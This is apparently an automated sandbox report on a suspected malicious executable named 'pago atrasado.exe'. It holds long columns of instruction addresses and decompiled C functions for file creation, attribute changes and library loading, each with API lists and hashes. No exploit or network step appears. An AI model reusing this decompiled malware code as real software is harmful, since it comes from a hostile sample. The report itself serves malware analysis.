                                            0x0040608e
                                            0x00406090
                                            0x00406091
                                            0x00406094
                                            0x00406096
                                            0x00406097
                                            0x00406099
                                            0x0040609c
                                            0x004060a1
                                            0x004060a6
                                            0x004060af
                                            0x004060c2
                                            0x004060c5
                                            0x004060d1
                                            0x004060f9
                                            0x004060fb
                                            0x00406109
                                            0x00406109
                                            0x0040610d
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x004060fd
                                            0x004060fd
                                            0x00406100
                                            0x00406101
                                            0x00406101
                                            0x00000000
                                            0x004060fd
                                            0x004060d7
                                            0x004060dc
                                            0x004060dc
                                            0x004060e5
                                            0x004060ed
                                            0x004060f0
                                            0x00000000
                                            0x004060f6
                                            0x004060f6
                                            0x00000000
                                            0x004060f6
                                            0x00000000
                                            0x00406113
                                            0x00406113
                                            0x00406117
                                            0x004069c3
                                            0x00000000
                                            0x004069c3
                                            0x00406120
                                            0x00406130
                                            0x00406133
                                            0x00406136
                                            0x00406136
                                            0x00406136
                                            0x00406139
                                            0x0040613d
                                            0x00000000
                                            0x00000000
                                            0x0040613f
                                            0x00406145
                                            0x0040616f
                                            0x00406175
                                            0x0040617c
                                            0x00000000
                                            0x0040617c
                                            0x0040614b
                                            0x0040614e
                                            0x00406153
                                            0x00406153
                                            0x0040615e
                                            0x00406166
                                            0x00406169
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x004061ae
                                            0x004061b4
                                            0x004061b7
                                            0x004061c4
                                            0x004061cc
                                            0x00406840
                                            0x00000000
                                            0x00000000
                                            0x00406183
                                            0x00406183
                                            0x00406187
                                            0x004069d2
                                            0x00000000
                                            0x004069d2
                                            0x00406193
                                            0x0040619e
                                            0x0040619e
                                            0x0040619e
                                            0x004061a1
                                            0x004061a4
                                            0x004061a7
                                            0x004061ac
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00406843
                                            0x00406843
                                            0x00406849
                                            0x0040684f
                                            0x00406855
                                            0x0040686f
                                            0x00406872
                                            0x00406878
                                            0x00406883
                                            0x00406885
                                            0x00406857
                                            0x00406857
                                            0x00406866
                                            0x0040686a
                                            0x0040686a
                                            0x0040688f
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x004061d4
                                            0x004061d6
                                            0x004061d9
                                            0x0040624a
                                            0x0040624d
                                            0x00406250
                                            0x00406257
                                            0x00406261
                                            0x00406840
                                            0x00406840
                                            0x00000000
                                            0x00406840
                                            0x00406840
                                            0x004061db
                                            0x004061df
                                            0x004061e2
                                            0x004061e4
                                            0x004061e7
                                            0x004061ea
                                            0x004061ec
                                            0x004061ef
                                            0x004061f1
                                            0x004061f6
                                            0x004061f9
                                            0x004061fc
                                            0x00406200
                                            0x00406207
                                            0x0040620a
                                            0x00406211
                                            0x00406215
                                            0x0040621d
                                            0x0040621d
                                            0x0040621d
                                            0x00406217
                                            0x00406217
                                            0x00406217
                                            0x0040620c
                                            0x0040620c
                                            0x0040620c
                                            0x00406221
                                            0x00406224
                                            0x00406242
                                            0x00406244
                                            0x00000000
                                            0x00406226
                                            0x00406226
                                            0x00406229
                                            0x0040622c
                                            0x0040622f
                                            0x00406231
                                            0x00406231
                                            0x00406231
                                            0x00406234
                                            0x00406237
                                            0x00406239
                                            0x0040623a
                                            0x0040623d
                                            0x00000000
                                            0x0040623d
                                            0x00000000
                                            0x00406473
                                            0x00406477
                                            0x00406495
                                            0x00406498
                                            0x0040649f
                                            0x004064a2
                                            0x004064a5
                                            0x004064a8
                                            0x004064ab
                                            0x004064ae
                                            0x004064b0
                                            0x004064b7
                                            0x004064b8
                                            0x004064ba
                                            0x004064bd
                                            0x004064c0
                                            0x004064c3
                                            0x004064c3
                                            0x004064c8
                                            0x00000000
                                            0x004064c8
                                            0x00406479
                                            0x0040647c
                                            0x0040647f
                                            0x00406489
                                            0x00406840
                                            0x00406840
                                            0x00000000
                                            0x00406840
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00406520
                                            0x00406524
                                            0x00000000
                                            0x00000000
                                            0x0040652a
                                            0x0040652e
                                            0x00000000
                                            0x00000000
                                            0x00406534
                                            0x00406536
                                            0x0040653a
                                            0x0040653a
                                            0x0040653d
                                            0x00406541
                                            0x00000000
                                            0x00000000
                                            0x00406591
                                            0x00406595
                                            0x0040659c
                                            0x0040659f
                                            0x004065a2
                                            0x004065ac
                                            0x00406840
                                            0x00406840
                                            0x00000000
                                            0x00406840
                                            0x00406840
                                            0x00406597
                                            0x00000000
                                            0x00000000
                                            0x004065b8
                                            0x004065bc
                                            0x004065c3
                                            0x004065c6
                                            0x004065c9
                                            0x004065be
                                            0x004065be
                                            0x004065be
                                            0x004065cc
                                            0x004065cf
                                            0x004065d2
                                            0x004065d2
                                            0x004065d5
                                            0x004065d8
                                            0x004065db
                                            0x004065db
                                            0x004065de
                                            0x004065e5
                                            0x004065ea
                                            0x00000000
                                            0x00000000
                                            0x00406678
                                            0x00406678
                                            0x0040667c
                                            0x00406a1a
                                            0x00000000
                                            0x00406a1a
                                            0x00406682
                                            0x00406685
                                            0x00406688
                                            0x0040668c
                                            0x0040668f
                                            0x00406695
                                            0x00406697
                                            0x00406697
                                            0x00406697
                                            0x0040669a
                                            0x0040669d
                                            0x00000000
                                            0x00000000
                                            0x0040626d
                                            0x0040626d
                                            0x00406271
                                            0x004069de
                                            0x00000000
                                            0x004069de
                                            0x00406277
                                            0x0040627a
                                            0x0040627d
                                            0x00406281
                                            0x00406284
                                            0x0040628a
                                            0x0040628c
                                            0x0040628c
                                            0x0040628c
                                            0x0040628f
                                            0x00406292
                                            0x00406292
                                            0x00406295
                                            0x00406298
                                            0x00000000
                                            0x00000000
                                            0x0040629e
                                            0x004062a4
                                            0x00000000
                                            0x00000000
                                            0x004062aa
                                            0x004062aa
                                            0x004062ae
                                            0x004062b1
                                            0x004062b4
                                            0x004062b7
                                            0x004062ba
                                            0x004062bb
                                            0x004062be
                                            0x004062c0
                                            0x004062c6
                                            0x004062c9
                                            0x004062cc
                                            0x004062cf
                                            0x004062d2
                                            0x004062d5
                                            0x004062d8
                                            0x004062f4
                                            0x004062f7
                                            0x004062fa
                                            0x004062fd
                                            0x00406304
                                            0x00406308
                                            0x0040630a
                                            0x0040630e
                                            0x004062da
                                            0x004062da
                                            0x004062de
                                            0x004062e6
                                            0x004062eb
                                            0x004062ed
                                            0x004062ef
                                            0x004062ef
                                            0x00406311
                                            0x00406318
                                            0x0040631b
                                            0x00000000
                                            0x00406321
                                            0x00000000
                                            0x00406321
                                            0x00000000
                                            0x00406326
                                            0x00406326
                                            0x0040632a
                                            0x004069ea
                                            0x00000000
                                            0x004069ea
                                            0x00406330
                                            0x00406333
                                            0x00406336
                                            0x0040633a
                                            0x0040633d
                                            0x00406343
                                            0x00406345
                                            0x00406345
                                            0x00406345
                                            0x00406348
                                            0x0040634b
                                            0x0040634b
                                            0x0040634b
                                            0x00406351
                                            0x00000000
                                            0x00000000
                                            0x00406353
                                            0x00406356
                                            0x00406359
                                            0x0040635c
                                            0x0040635f
                                            0x00406362
                                            0x00406365
                                            0x00406368
                                            0x0040636b
                                            0x0040636e
                                            0x00406371
                                            0x00406389
                                            0x0040638c
                                            0x0040638f
                                            0x00406392
                                            0x00406392
                                            0x00406395
                                            0x00406399
                                            0x0040639b
                                            0x00406373
                                            0x00406373
                                            0x0040637b
                                            0x00406380
                                            0x00406382
                                            0x00406384
                                            0x00406384
                                            0x0040639e
                                            0x004063a5
                                            0x004063a8
                                            0x00000000
                                            0x004063aa
                                            0x00000000
                                            0x004063aa
                                            0x004063a8
                                            0x004063af
                                            0x004063af
                                            0x004063af
                                            0x004063af
                                            0x00000000
                                            0x00000000
                                            0x004063ea
                                            0x004063ea
                                            0x004063ee
                                            0x004069f6
                                            0x00000000
                                            0x004069f6
                                            0x004063f4
                                            0x004063f7
                                            0x004063fa
                                            0x004063fe
                                            0x00406401
                                            0x00406407
                                            0x00406409
                                            0x00406409
                                            0x00406409
                                            0x0040640c
                                            0x0040640f
                                            0x0040640f
                                            0x00406415
                                            0x004063b3
                                            0x004063b3
                                            0x004063b6
                                            0x00000000
                                            0x004063b6
                                            0x00406417
                                            0x00406417
                                            0x0040641a
                                            0x0040641d
                                            0x00406420
                                            0x00406423
                                            0x00406426
                                            0x00406429
                                            0x0040642c
                                            0x0040642f
                                            0x00406432
                                            0x00406435
                                            0x0040644d
                                            0x00406450
                                            0x00406453
                                            0x00406456
                                            0x00406456
                                            0x00406459
                                            0x0040645d
                                            0x0040645f
                                            0x00406437
                                            0x00406437
                                            0x0040643f
                                            0x00406444
                                            0x00406446
                                            0x00406448
                                            0x00406448
                                            0x00406462
                                            0x00406469
                                            0x0040646c
                                            0x00000000
                                            0x0040646e
                                            0x00000000
                                            0x0040646e
                                            0x00000000
                                            0x004066fb
                                            0x004066fb
                                            0x004066ff
                                            0x00406a26
                                            0x00000000
                                            0x00406a26
                                            0x00406705
                                            0x00406708
                                            0x0040670b
                                            0x0040670f
                                            0x00406712
                                            0x00406718
                                            0x0040671a
                                            0x0040671a
                                            0x0040671a
                                            0x0040671d
                                            0x00000000
                                            0x00000000
                                            0x004064cb
                                            0x004064cb
                                            0x004064ce
                                            0x00406840
                                            0x00406840
                                            0x00000000
                                            0x00406840
                                            0x00000000
                                            0x0040680a
                                            0x0040680e
                                            0x00406830
                                            0x00406833
                                            0x0040683d
                                            0x00406840
                                            0x00406840
                                            0x00000000
                                            0x00406840
                                            0x00406840
                                            0x00406810
                                            0x00406813
                                            0x00406817
                                            0x0040681a
                                            0x0040681a
                                            0x0040681d
                                            0x00000000
                                            0x00000000
                                            0x004068c7
                                            0x004068cb
                                            0x004068e9
                                            0x004068e9
                                            0x004068e9
                                            0x004068f0
                                            0x004068f7
                                            0x004068fe
                                            0x004068fe
                                            0x00000000
                                            0x004068fe
                                            0x004068cd
                                            0x004068d0
                                            0x004068d3
                                            0x004068d6
                                            0x004068dd
                                            0x00406821
                                            0x00406821
                                            0x00406824
                                            0x00000000
                                            0x00000000
                                            0x004069b8
                                            0x004069bb
                                            0x004068bc
                                            0x00000000
                                            0x00000000
                                            0x004065f2
                                            0x004065f4
                                            0x004065fb
                                            0x004065fc
                                            0x004065fe
                                            0x00406601
                                            0x00000000
                                            0x00000000
                                            0x00406609
                                            0x0040660c
                                            0x0040660f
                                            0x00406611
                                            0x00406613
                                            0x00406613
                                            0x00406614
                                            0x00406617
                                            0x0040661e
                                            0x00406621
                                            0x0040662f
                                            0x00000000
                                            0x00000000
                                            0x00406905
                                            0x00406905
                                            0x00406908
                                            0x0040690f
                                            0x00000000
                                            0x00000000
                                            0x00406914
                                            0x00406914
                                            0x00406918
                                            0x00406a50
                                            0x00000000
                                            0x00406a50
                                            0x0040691e
                                            0x00406921
                                            0x00406924
                                            0x00406928
                                            0x0040692b
                                            0x00406931
                                            0x00406933
                                            0x00406933
                                            0x00406933
                                            0x00406936
                                            0x00406939
                                            0x00406939
                                            0x00406939
                                            0x00406939
                                            0x0040693c
                                            0x0040693c
                                            0x00406940
                                            0x004069a0
                                            0x004069a3
                                            0x004069a8
                                            0x004069a9
                                            0x004069ab
                                            0x004069ad
                                            0x004069b0
                                            0x004068bc
                                            0x004068bc
                                            0x00000000
                                            0x004068c2
                                            0x004068bc
                                            0x00406942
                                            0x00406948
                                            0x0040694b
                                            0x0040694e
                                            0x00406951
                                            0x00406954
                                            0x00406957
                                            0x0040695a
                                            0x0040695d
                                            0x00406960
                                            0x00406963
                                            0x0040697c
                                            0x0040697f
                                            0x00406982
                                            0x00406985
                                            0x00406989
                                            0x0040698b
                                            0x0040698b
                                            0x0040698c
                                            0x0040698f
                                            0x00406965
                                            0x00406965
                                            0x0040696d
                                            0x00406972
                                            0x00406974
                                            0x00406977
                                            0x00406977
                                            0x00406992
                                            0x00406999
                                            0x00000000
                                            0x0040699b
                                            0x00000000
                                            0x0040699b
                                            0x00000000
                                            0x00406637
                                            0x0040663a
                                            0x00406670
                                            0x004067a0
                                            0x004067a0
                                            0x004067a0
                                            0x004067a0
                                            0x004067a3
                                            0x004067a3
                                            0x004067a6
                                            0x004067a8
                                            0x00406a32
                                            0x00000000
                                            0x00406a32
                                            0x004067ae
                                            0x004067b1
                                            0x00000000
                                            0x00000000
                                            0x004067b7
                                            0x004067bb
                                            0x004067be
                                            0x004067be
                                            0x004067be
                                            0x00000000
                                            0x004067be
                                            0x0040663c
                                            0x0040663e
                                            0x00406640
                                            0x00406642
                                            0x00406645
                                            0x00406646
                                            0x00406648
                                            0x0040664a
                                            0x0040664d
                                            0x00406650
                                            0x00406666
                                            0x0040666b
                                            0x004066a3
                                            0x004066a3
                                            0x004066a7
                                            0x004066d3
                                            0x004066d5
                                            0x004066dc
                                            0x004066df
                                            0x004066e2
                                            0x004066e2
                                            0x004066e7
                                            0x004066e7
                                            0x004066e9
                                            0x004066ec
                                            0x004066f3
                                            0x004066f6
                                            0x00406723
                                            0x00406723
                                            0x00406726
                                            0x00406729
                                            0x0040679d
                                            0x0040679d
                                            0x0040679d
                                            0x00000000
                                            0x0040679d
                                            0x0040672b
                                            0x00406731
                                            0x00406734
                                            0x00406737
                                            0x0040673a
                                            0x0040673d
                                            0x00406740
                                            0x00406743
                                            0x00406746
                                            0x00406749
                                            0x0040674c
                                            0x00406765
                                            0x00406767
                                            0x0040676a
                                            0x0040676b
                                            0x0040676e
                                            0x00406770
                                            0x00406773
                                            0x00406775
                                            0x00406777
                                            0x0040677a
                                            0x0040677c
                                            0x0040677f
                                            0x00406783
                                            0x00406785
                                            0x00406785
                                            0x00406786
                                            0x00406789
                                            0x0040678c
                                            0x0040674e
                                            0x0040674e
                                            0x00406756
                                            0x0040675b
                                            0x0040675d
                                            0x00406760
                                            0x00406760
                                            0x0040678f
                                            0x00406796
                                            0x00406720
                                            0x00406720
                                            0x00406720
                                            0x00406720
                                            0x00000000
                                            0x00406798
                                            0x00000000
                                            0x00406798
                                            0x00406796
                                            0x004066a9
                                            0x004066ac
                                            0x004066ae
                                            0x004066b1
                                            0x004066b4
                                            0x004066b7
                                            0x004066b9
                                            0x004066bc
                                            0x004066bf
                                            0x004066bf
                                            0x004066c2
                                            0x004066c2
                                            0x004066c5
                                            0x004066cc
                                            0x004066a0
                                            0x004066a0
                                            0x004066a0
                                            0x004066a0
                                            0x00000000
                                            0x004066ce
                                            0x00000000
                                            0x004066ce
                                            0x004066cc
                                            0x00406652
                                            0x00406655
                                            0x00406657
                                            0x0040665a
                                            0x00000000
                                            0x00000000
                                            0x004063b9
                                            0x004063b9
                                            0x004063bd
                                            0x00406a02
                                            0x00000000
                                            0x00406a02
                                            0x004063c3
                                            0x004063c6
                                            0x004063c9
                                            0x004063cc
                                            0x004063cf
                                            0x004063d2
                                            0x004063d5
                                            0x004063d7
                                            0x004063da
                                            0x004063dd
                                            0x004063e0
                                            0x004063e2
                                            0x004063e2
                                            0x004063e2
                                            0x00000000
                                            0x00000000
                                            0x00406544
                                            0x00406544
                                            0x00406548
                                            0x00406a0e
                                            0x00000000
                                            0x00406a0e
                                            0x0040654e
                                            0x00406551
                                            0x00406554
                                            0x00406557
                                            0x00406559
                                            0x00406559
                                            0x00406559
                                            0x0040655c
                                            0x0040655f
                                            0x00406562
                                            0x00406565
                                            0x00406568
                                            0x0040656b
                                            0x0040656c
                                            0x0040656e
                                            0x0040656e
                                            0x0040656e
                                            0x00406571
                                            0x00406574
                                            0x00406577
                                            0x0040657a
                                            0x0040657a
                                            0x0040657a
                                            0x0040657d
                                            0x0040657f
                                            0x0040657f
                                            0x00000000
                                            0x00000000
                                            0x004067c1
                                            0x004067c1
                                            0x004067c1
                                            0x004067c5
                                            0x00000000
                                            0x00000000
                                            0x004067cb
                                            0x004067ce
                                            0x004067d1
                                            0x004067d4
                                            0x004067d6
                                            0x004067d6
                                            0x004067d6
                                            0x004067d9
                                            0x004067dc
                                            0x004067df
                                            0x004067e2
                                            0x004067e5
                                            0x004067e8
                                            0x004067e9
                                            0x004067eb
                                            0x004067eb
                                            0x004067eb
                                            0x004067ee
                                            0x004067f1
                                            0x004067f4
                                            0x004067f7
                                            0x004067fa
                                            0x004067fe
                                            0x00406800
                                            0x00406803
                                            0x00000000
                                            0x00406805
                                            0x00406582
                                            0x00406582
                                            0x00000000
                                            0x00406582
                                            0x00406803
                                            0x00406a38
                                            0x00000000
                                            0x00000000
                                            0x00406067
                                            0x00406a6f
                                            0x00406a6f
                                            0x00000000
                                            0x00406a6f
                                            0x004068bc
                                            0x00406843
                                            0x00406840

                                            Memory Dump Source
                                            • Source File: 00000000.00000002.248853069.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.248849693.0000000000400000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.248859062.0000000000407000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.248866383.0000000000409000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.248879905.0000000000422000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.248885504.000000000042A000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.248890779.000000000042D000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: a35431ca5ac5a63de0c48c0fa1b7027ef1301f6ad8cfe25f67b835d71510927c
                                            • Instruction ID: 5a6a632b4197b5bad3eb6902eefc8e88da0621a447eca7476662d6aa47a1fed0
                                            • Opcode Fuzzy Hash: a35431ca5ac5a63de0c48c0fa1b7027ef1301f6ad8cfe25f67b835d71510927c
                                            • Instruction Fuzzy Hash: 93714571E00228CFEF28DF98C8547ADBBB1FB44305F15816AD916BB281C7789A56DF44
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 10008BA7, Relevance: 3.0, APIs: 2, Instructions: 45COMMON
                                            Download Yara Rule
                                            C-Code - Quality: 100%
                                            			E10008BA7() {
				intOrPtr _t3;
				intOrPtr _t4;
				void* _t6;
				intOrPtr _t9;
				void* _t12;
				intOrPtr _t13;

				_t3 =  *0x1001c424; // 0x200
				_t13 = 0x14;
				if(_t3 != 0) {
					if(_t3 < _t13) {
						_t3 = _t13;
						goto L4;
					}
				} else {
					_t3 = 0x200;
					L4:
					 *0x1001c424 = _t3;
				}
				_t4 = E1000A399(_t3, 4); // executed
				 *0x1001c428 = _t4;
				if(_t4 != 0) {
					L8:
					_t12 = 0;
					_t9 = 0x1001b328;
					while(1) {
						 *((intOrPtr*)(_t12 + _t4)) = _t9;
						_t9 = _t9 + 0x20;
						_t12 = _t12 + 4;
						if(_t9 >= 0x1001b5a8) {
							break;
						}
						_t4 =  *0x1001c428; // 0x0
					}
					return 0;
				} else {
					 *0x1001c424 = _t13;
					_t4 = E1000A399(_t13, 4);
					 *0x1001c428 = _t4;
					if(_t4 != 0) {
						goto L8;
					} else {
						_t6 = 0x1a;
						return _t6;
					}
				}
			}









                                            0x10008ba7
                                            0x10008baf
                                            0x10008bb2
                                            0x10008bbd
                                            0x10008bbf
                                            0x00000000
                                            0x10008bbf
                                            0x10008bb4
                                            0x10008bb4
                                            0x10008bc1
                                            0x10008bc1
                                            0x10008bc1
                                            0x10008bc9
                                            0x10008bce
                                            0x10008bd7
                                            0x10008bf7
                                            0x10008bf7
                                            0x10008bf9
                                            0x10008bfe
                                            0x10008bfe
                                            0x10008c01
                                            0x10008c04
                                            0x10008c0d
                                            0x00000000
                                            0x00000000
                                            0x10008c0f
                                            0x10008c0f
                                            0x10008c19
                                            0x10008bd9
                                            0x10008bdc
                                            0x10008be2
                                            0x10008be7
                                            0x10008bf0
                                            0x00000000
                                            0x10008bf2
                                            0x10008bf4
                                            0x10008bf6
                                            0x10008bf6
                                            0x10008bf0

                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.250579809.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                            • Associated: 00000000.00000002.250573153.0000000010000000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.250606846.0000000010014000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.250615205.000000001001A000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.250625298.000000001001F000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID: __calloc_crt
                                            • String ID:
                                            • API String ID: 3494438863-0
                                            • Opcode ID: 8f113793b190d6d44cdcd27a5e47e89da682bb54b2fcbf77c4c3fb6db7de4087
                                            • Instruction ID: e2bdcb3561d9bfeec701474f9bbc4fdc063ddb83ebe298a8116df3d2e5ea3c85
                                            • Opcode Fuzzy Hash: 8f113793b190d6d44cdcd27a5e47e89da682bb54b2fcbf77c4c3fb6db7de4087
                                            • Instruction Fuzzy Hash: 87F0C2B12086628BF314CB69BC92F6937E8F7093B0F11442BF240DF19AE770CA814358
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00401389, Relevance: 3.0, APIs: 2, Instructions: 43windowCOMMON
                                            Download Yara Rule
                                            C-Code - Quality: 69%
                                            			E00401389(signed int _a4) {
				intOrPtr* _t6;
				void* _t8;
				void* _t10;
				signed int _t11;
				void* _t12;
				intOrPtr _t15;
				signed int _t16;
				signed int _t17;
				void* _t18;

				_t17 = _a4;
				while(_t17 >= 0) {
					_t15 =  *0x423f70; // 0x662014
					_t6 = _t17 * 0x1c + _t15;
					if( *_t6 == 1) {
						break;
					}
					_push(_t6); // executed
					_t8 = E00401434(); // executed
					if(_t8 == 0x7fffffff) {
						return 0x7fffffff;
					}
					_t10 = E0040136D(_t8);
					if(_t10 != 0) {
						_t11 = _t10 - 1;
						_t16 = _t17;
						_t17 = _t11;
						_t12 = _t11 - _t16;
					} else {
						_t12 = _t10 + 1;
						_t17 = _t17 + 1;
					}
					if( *((intOrPtr*)(_t18 + 0xc)) != 0) {
						 *0x42372c =  *0x42372c + _t12;
						SendMessageA( *(_t18 + 0x18), 0x402, MulDiv( *0x42372c, 0x7530,  *0x423714), 0);
					}
				}
				return 0;
			}












                                            0x0040138a
                                            0x004013fa
                                            0x00401392
                                            0x0040139b
                                            0x004013a0
                                            0x00000000
                                            0x00000000
                                            0x004013a2
                                            0x004013a3
                                            0x004013ad
                                            0x00000000
                                            0x00401404
                                            0x004013b0
                                            0x004013b7
                                            0x004013bd
                                            0x004013be
                                            0x004013c0
                                            0x004013c2
                                            0x004013b9
                                            0x004013b9
                                            0x004013ba
                                            0x004013ba
                                            0x004013c9
                                            0x004013cb
                                            0x004013f4
                                            0x004013f4
                                            0x004013c9
                                            0x00000000

                                            APIs
                                            • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                                            • SendMessageA.USER32 ref: 004013F4
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.248853069.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.248849693.0000000000400000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.248859062.0000000000407000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.248866383.0000000000409000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.248879905.0000000000422000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.248885504.000000000042A000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.248890779.000000000042D000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID: MessageSend
                                            • String ID:
                                            • API String ID: 3850602802-0
                                            • Opcode ID: 3f695f75208f640be867956647b5e414a31c5be601b183f87834ddd8f53d2100
                                            • Instruction ID: 9ae17229e6d33b90ed82c987c6c55cbce7d6b2b41e99f766f3e5bcfc28262e64
                                            • Opcode Fuzzy Hash: 3f695f75208f640be867956647b5e414a31c5be601b183f87834ddd8f53d2100
                                            • Instruction Fuzzy Hash: CA014472B242109BEB184B389C04B2A32A8E710319F10813BF841F72F1D638CC028B4D
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00405F28, Relevance: 3.0, APIs: 2, Instructions: 22libraryloaderCOMMON
                                            Download Yara Rule
                                            C-Code - Quality: 100%
                                            			E00405F28(signed int _a4) {
				struct HINSTANCE__* _t5;
				signed int _t10;

				_t10 = _a4 << 3;
				_t8 =  *(_t10 + 0x409208);
				_t5 = GetModuleHandleA( *(_t10 + 0x409208));
				if(_t5 != 0) {
					L2:
					return GetProcAddress(_t5,  *(_t10 + 0x40920c));
				}
				_t5 = E00405EBA(_t8); // executed
				if(_t5 == 0) {
					return 0;
				}
				goto L2;
			}





                                            0x00405f30
                                            0x00405f33
                                            0x00405f3a
                                            0x00405f42
                                            0x00405f4e
                                            0x00000000
                                            0x00405f55
                                            0x00405f45
                                            0x00405f4c
                                            0x00000000
                                            0x00405f5d
                                            0x00000000

                                            APIs
                                            • GetModuleHandleA.KERNEL32(?,?,?,00403165,0000000D), ref: 00405F3A
                                            • GetProcAddress.KERNEL32(00000000,?), ref: 00405F55
                                              • Part of subcall function 00405EBA: GetSystemDirectoryA.KERNEL32 ref: 00405ED1
                                              • Part of subcall function 00405EBA: wsprintfA.USER32 ref: 00405F0A
                                              • Part of subcall function 00405EBA: LoadLibraryExA.KERNEL32(?,00000000,00000008), ref: 00405F1E
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.248853069.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.248849693.0000000000400000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.248859062.0000000000407000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.248866383.0000000000409000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.248879905.0000000000422000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.248885504.000000000042A000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.248890779.000000000042D000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
                                            • String ID:
                                            • API String ID: 2547128583-0
                                            • Opcode ID: c95d3685517970e0c019aac56d97440eb4eeb9d6cd7db5aa949554c45ee13345
                                            • Instruction ID: ae0a47d2ae808e9ad23d4e83699500a4151a320e34d6f574464110b7e3b32053
                                            • Opcode Fuzzy Hash: c95d3685517970e0c019aac56d97440eb4eeb9d6cd7db5aa949554c45ee13345
                                            • Instruction Fuzzy Hash: 7AE08632A0951176D61097709D0496773ADDAC9740300087EF659F6181D738AC119E6D
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 0040586F, Relevance: 3.0, APIs: 2, Instructions: 16fileCOMMON
                                            Download Yara Rule
                                            C-Code - Quality: 68%
                                            			E0040586F(CHAR* _a4, long _a8, long _a12) {
				signed int _t5;
				void* _t6;

				_t5 = GetFileAttributesA(_a4); // executed
				asm("sbb ecx, ecx");
				_t6 = CreateFileA(_a4, _a8, 1, 0, _a12,  ~(_t5 + 1) & _t5, 0); // executed
				return _t6;
			}





                                            0x00405873
                                            0x00405880
                                            0x00405895
                                            0x0040589b

                                            APIs
                                            • GetFileAttributesA.KERNEL32(00000003,00402C95,C:\Users\user\Desktop\pago atrasado.exe,80000000,00000003), ref: 00405873
                                            • CreateFileA.KERNEL32(?,?,00000001,00000000,?,00000001,00000000), ref: 00405895
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.248853069.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.248849693.0000000000400000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.248859062.0000000000407000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.248866383.0000000000409000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.248879905.0000000000422000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.248885504.000000000042A000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.248890779.000000000042D000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID: File$AttributesCreate
                                            • String ID:
                                            • API String ID: 415043291-0
                                            • Opcode ID: 5340b84021e5d080a0f841e0942d03c921a309eaf12029fe197c00c0f40f89c7
                                            • Instruction ID: e615d4ce70e2a600ad3370b8a7bf294de68ab1b424622093f8f4c5f34a5113e1
                                            • Opcode Fuzzy Hash: 5340b84021e5d080a0f841e0942d03c921a309eaf12029fe197c00c0f40f89c7
                                            • Instruction Fuzzy Hash: D5D09E31658301AFEF098F20DD1AF2EBBA2EB84B01F10962CB646940E0D6715C59DB16
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00405850, Relevance: 3.0, APIs: 2, Instructions: 9COMMON
                                            Download Yara Rule
                                            C-Code - Quality: 100%
                                            			E00405850(CHAR* _a4) {
				signed char _t3;

				_t3 = GetFileAttributesA(_a4); // executed
				if(_t3 != 0xffffffff) {
					return SetFileAttributesA(_a4, _t3 & 0x000000fe);
				}
				return _t3;
			}




                                            0x00405854
                                            0x0040585d
                                            0x00000000
                                            0x00405866
                                            0x0040586c

                                            APIs
                                            • GetFileAttributesA.KERNEL32(?,0040565B,?,?,?), ref: 00405854
                                            • SetFileAttributesA.KERNEL32(?,00000000), ref: 00405866
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.248853069.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.248849693.0000000000400000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.248859062.0000000000407000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.248866383.0000000000409000.00000004.00020000.sdmp Download File
